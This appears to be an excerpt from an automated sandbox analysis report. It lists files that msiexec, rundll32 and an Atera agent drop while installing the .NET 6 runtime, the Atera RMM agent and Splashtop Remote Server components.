                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Formats.Asn1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\qrcodelib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdscale.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x64\SRUsb.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Registry.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libssl-3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\CredProvider\x64\SRCredentialProvider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVideoCtrl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Quic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxyumd.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\XDColMan.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12F6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Annotations.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SROpus.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clrjit.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\64bits\stdpms.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264Wrapper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Intrinsics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Serialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\32bits\stvad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore_amd64_amd64_6.0.3524.45918.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\swresample-2.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.DispatchProxy.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRApp.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\sthid.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxyumd32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\hidkmdf.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Native.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVideoCtrlEx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\coreclr.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\setupdrv.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clretwrc.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\32bits\stvspk.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ObjectModel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceModel.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxyumd32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\hidkmdf.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK_x86.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\64bits\stvspk.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\32bits\stvad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x86\SRUsbVhciCtrl32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI65BF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.CoreLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\stprintmon.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6457.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.AccessControl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdsmplui.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdbook.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\XDColMan.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_proxyumd32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxyumd32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppCam.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stmirror.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6738.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxyumd.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordbi.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxywddm.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Windows.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDEEF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stmirror.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppFileHound.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\stprintmon.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebProxy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.DataContractSerialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAgent.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceProcess.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3352.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdscale.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAdemWrapper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Uri.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAudioChat.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\my_setup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Elevator.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\ucrtbase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\dbgshim.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\setupdrv.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\NvFBC.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\PinShortCut.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x64\SRWacomUtil64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcurl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\sthid.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_proxywddm.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUpdateInstall.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\my_setup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\setupdrv.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\enum64.exeJump to dropped file
